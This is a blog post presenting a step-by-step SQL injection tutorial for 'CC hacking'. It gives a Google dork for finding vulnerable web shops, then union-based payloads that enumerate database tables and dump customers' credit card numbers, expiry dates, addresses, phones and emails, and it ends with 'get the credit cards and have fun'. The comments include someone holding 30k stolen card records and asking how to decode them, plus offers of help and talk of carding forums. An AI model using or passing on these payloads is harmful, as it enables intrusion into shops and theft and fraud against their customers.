WHAT'S NEW?
Loading...

(CC Hacking)New SQL Injection Tutorials 2016

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker)..This is new Tutorial.by me for hacking CC

1) we got to search google for webshops , I used this dork :


Code:
inurl:customer_testimonials.php testimonial_id=


2)lets say we got this site 



Code:
http://www.JustExample.com/customer_...stimonial_id=7


3) we got to check if its vulnerable to SQLi , we add this 

Code:
'
to url :

>>>


Code:
http://www.JustExample.com/customer_...stimonial_id=7'


if we get a error means website its vuln.

4) we have to check for column number we try with 10 first 


Code:
+order+by+10-
- :

>>>



Code:
http://www.JustExample.com/customer_...+order+by+10--



if we dont get a error means the website has more then 10 columns , if we get a error means the website has less then 10 columns

5 )this time we get a error now we try from 1 to 9 


Code:
+union+select+1,2,3,4,5,6,7,8,9--


>>>


Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


now we found it the website has 9 columns

6) most of time we can get infos from table 3 and 6 , lets say now we can from 3 xD , now we can get database user , database name and database version in this way :

*- database user


Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


*- database name


Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


*- database version


Code:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


7) we need the table names we add this to url :


Code:
+union+select+1,2,table_name,4,5,6,7,8,9+from+info rmation_schema.tables--




Code:
http://www.JustExample.com/customer_...chema.tables--


now we need columns : we add this to url :

Code:
+union+select+1,2,concat(table_name,char(58),colum n_name),4,5,6,7,8,9+from+information_schema.column s--


>>>

Code:
http://www.JustExample.com/customer_...hema.columns--
9) now all we got to do is view the orders and customers infos (there are the credit cards xD) : if we add this to url we will get credit card numbers , payment method , credit card type ......


Code:
+union+select+1,2,concat(payment_method,char(58),c c_type,char(58),cc_number,char(58),cc_expires),4,5 ,6,7,8,9fromorders--


>>>


Code:
http://www.JustExample.com/customer_...+from+orders--


if we add this to url we will get many infos about costumers , address , phone number , e-mails , zip code , and the credit card infos all of them


Code:
+union+select+1,2,concat(orders_id,0x2F,cc_type,0x 2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,cu stomers_street_address,0x2F,customers_suburb,0x2F, customers_city,0x2F,customers_postcode,0x2F,custom ers_state,0x2F,customers_country,0x2F,customers_te lephone,0x2F,customers_email_address,0x2F,date_pur chased),4,5,6,7,8,9+from+orders+


>>>


Code:
/customer_testimonials.php?&testimonial_id=7+union+ select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_o wner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers _street_address,0x2F,customers_suburb,0x2F,custome rs_city,0x2F,customers_postcode,0x2F,customers_sta te,0x2F,customers_country,0x2F,customers_telephone ,0x2F,customers_email_address,0x2F,date_purchased) ,4,5,6,7,8,9+from+orders+


now one step left

10 ) get the credit cards and have fun....

Don't forget to use your brain......

ENJOY !!!!

5 comments: Leave Your Comments

  1. hi im looking for somehelp here, i got 30k cc details but only the card number was in code like this !~!1 for them all so do i need that and if so is there anyway to crack the code? i have another list with everything except the cvv number, same again its in code. on both i have all these details - BillName, BillStreet, BillStreet2, BillCity, BillState, BillZip, BillPhone, BillEmail, CardType, CardNumLastFour, CardExpMonth, CardExpYear, CardCvv. but as i said the first one is missing thecard number and the other one is missing cvv number, so do i need those or can i do anything with them as it is? thanks for your help in advance.

    ReplyDelete
  2. If you need help for this problem contact me at this address thehacker.city01@gmail.com

    ReplyDelete
  3. If you need help for this problem contact me at this address thehacker.city01@gmail.com

    ReplyDelete
  4. I am hving the same issues like him is it ok with you if i contect you through email as well

    ReplyDelete
  5. You have been thee onky one that i red that even tryed or replted back to any ?s even in the 2 carding forums i signed up for they were pretty much dicks flashing tje bling blingnbut thats it abd am really enjoying this whole thing but am in the verhe of giving up if you can kool 305bornandrasied @ the g.mbox thx brother

    ReplyDelete

!!!THANK YOU VISITING OUR BLOG!!!